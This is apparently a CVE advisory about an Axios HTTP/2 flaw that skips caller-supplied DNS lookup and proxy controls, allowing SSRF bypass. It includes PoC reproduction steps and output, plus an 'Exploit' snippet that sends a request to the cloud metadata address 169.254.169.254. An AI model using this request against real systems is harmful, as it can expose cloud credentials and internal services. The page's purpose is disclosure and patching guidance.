Axios, HTTP/2 DNS Lookup and Proxy Bypass, CVE-2026-101898 (High) -DC-Sep2026-2671

Listen to this Post

CVE-2026-101898 is a security vulnerability in Axios, a widely used promise-based HTTP client for Node.js and browsers. The flaw exists in the HTTP/2 request handling path when `httpVersion: 2` is specified. Unlike the HTTP/1 adapter, which properly wraps and forwards the caller-supplied `config.lookup` function and applies proxy routing through setProxy(), the HTTP/2 transport builds a session using only options.http2Options. This drops the top-level lookup, agent, and proxy state. In lib/adapters/http.js, the adapter reads lookup, wraps it, stores it on request options, and applies setProxy(). However, `http2Transport.request()` constructs an authority from the destination and calls http2Sessions.getSession(authority, http2Options). The session pool then invokes `http2.connect(authority, options)` with only the `http2Options` object. Consequently, the configured DNS lookup and the proxy or tunneling agent are never forwarded. This means an application that relies on Axios’s `lookup` or proxy routing to enforce SSRF protection or outbound network policy can be bypassed. An attacker who can influence request destinations may cause the server to connect directly to internal services, cloud metadata endpoints, or other restricted resources. The vulnerability affects Axios versions from 1.13.0 until 1.20.0. It is not an unconditional SSRF; exploitation requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by lookup or proxy policy. The issue is fixed in version 1.20.0.

DailyCVE Form:

Platform: Axios
Version: 1.13.0-1.20.0
Vulnerability: SSRF Bypass
Severity: High
date: 2026-09-28

Prediction: 2026-10-15

What Undercode Say:

Analytics

The vulnerability allows bypassing DNS lookup policies and proxy configurations in Axios HTTP/2 requests. Below are reproduction commands and code snippets from the original report.
To reproduce the PoC, run the following from the root of an Axios checkout:

git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs

The PoC sets up an HTTPS origin with HTTP/2, a rejecting HTTP proxy, and a custom Axios lookup callback that throws EPOLICY. The HTTP/1 control request correctly fails with EPOLICY. The HTTP/2 request, despite having both controls, returns HTTP 200 with REACHED_BLOCKED_ORIGIN. The lookup counter remains at 1, and the proxy observes no traffic, proving both controls were skipped.

Relevant output from the PoC run:

{
"axiosVersion": "1.18.1",
"configuredControls": {
"lookup": "reject every DNS lookup with EPOLICY",
"proxy": "http://127.0.0.1:<port> (reject every request)"
},
"http1Control": "EPOLICY: blocked by application DNS policy",
"http2Result": {
"status": 200,
"data": "REACHED_BLOCKED_ORIGIN"
},
"lookupCalls": 1,
"proxyObservedTraffic": false,
"events": [
{
"server": "origin",
"protocol": "h2",
"path": "/internal"
}
]
}

Exploit: (Educational Purposes!)

An attacker can exploit this by influencing a request destination in an application that uses Axios with `httpVersion: 2` and relies on `config.lookup` or proxy routing for SSRF protection. The attacker supplies a URL pointing to an internal service, such as `http://169.254.169.254/latest/meta-data/` for cloud metadata. Because the HTTP/2 path ignores the configured lookup and proxy, the request reaches the internal endpoint directly. The following code demonstrates the vulnerable call:

axios.get('http://169.254.169.254/latest/meta-data/', {
httpVersion: 2,
lookup: (hostname, opts, cb) => cb(new Error('EPOLICY: blocked by application DNS policy')),
proxy: false
});

Under HTTP/2, the lookup function is never called, and the request bypasses any proxy, connecting directly to the metadata service.

Protection: from this CVE

Upgrade Axios to version 1.20.0 or later. If immediate upgrade is not possible, use the HTTP/1 adapter path for requests that depend on `lookup` or proxy controls. Alternatively, enforce destination allow/deny policies outside of Axios before initiating the request. Network-level egress filtering can also restrict direct HTTP/2 connections that do not pass through approved proxies.

Impact

In affected server-side deployments, an attacker can cause Axios to connect directly to destinations that the configured resolver or proxy would have rejected. This can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems. The vulnerability bypasses caller-supplied destination validation, silently removing security controls when HTTP/2 is enabled. Applications that allow user-influenced request destinations and rely on Axios `lookup` or proxy routing for SSRF prevention are at risk. HTTP/2 support is marked experimental, but neither the documentation nor the threat model warns that lookup and proxy controls are ignored.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top